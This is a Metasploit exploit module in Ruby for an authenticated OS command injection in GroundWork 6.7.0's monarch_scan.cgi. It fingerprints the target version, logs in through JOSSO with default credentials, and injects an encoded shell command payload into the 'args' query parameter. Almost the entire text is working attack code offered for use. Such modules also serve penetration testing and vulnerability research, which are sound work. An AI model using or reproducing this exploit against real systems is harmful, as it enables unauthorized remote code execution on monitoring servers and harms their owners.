GroundWork monarch_scan.cgi OS Command Injection

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "GroundWork monarch_scan.cgi OS Command Injection",  
'Description' => %q{  
This module exploits a vulnerability found in GroundWork 6.7.0. This software  
is used for network, application and cloud monitoring. The vulnerability exists in  
the monarch_scan.cgi, where user controlled input is used in the perl qx function,  
which allows any remote authenticated attacker, whatever his privileges are, to  
inject system commands and gain arbitrary code execution. The module has been tested  
successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04  
based VM appliance.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Johannes Greil', # Vulnerability Discovery, PoC  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'OSVDB', '91051' ],  
[ 'US-CERT-VU', '345260' ],  
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]  
],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 8190,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd'  
},  
# Based on the default Ubuntu 10.04 VM appliance  
'RequiredCmd' => 'generic telnet netcat perl python'  
},  
'Platform' => ['unix', 'linux'],  
'Targets' =>  
[  
['GroundWork 6.7.0', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Mar 8 2013",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'GroundWork Username', 'user']),  
OptString.new('PASSWORD', [true, 'GroundWork Password', 'user'])  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri("josso", "signon", "login.do")  
})  
  
if res and res.body =~ /GroundWork.*6\.7\.0/  
return Exploit::CheckCode::Appears  
elsif res and res.body =~ /GroundWork/  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Safe  
end  
end  
  
def get_josso_token  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),  
'vars_post' => {  
'josso_cmd' => 'login',  
'josso_username' => datastore['USERNAME'],  
'josso_password' => datastore['PASSWORD']  
}  
})  
if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/  
return $1  
else  
return nil  
end  
end  
  
def execute_command(command)  
http_handler = ((datastore['SSL']) ? "https" : "http")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri("monarch", "monarch_scan.cgi"),  
'headers' =>  
{  
'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"  
},  
'cookie' => "JOSSO_SESSIONID=#{@josso_id}",  
'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"  
})  
return res  
end  
  
def exploit  
peer = "#{rhost}:#{rport}"  
  
print_status("#{peer} - Attempting to login...")  
@josso_id = get_josso_token  
if @josso_id.nil?  
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")  
end  
print_good("#{peer} - Authentication successful")  
  
print_status("#{peer} - Sending malicious request...")  
execute_command(payload.encoded)  
end  
end  
`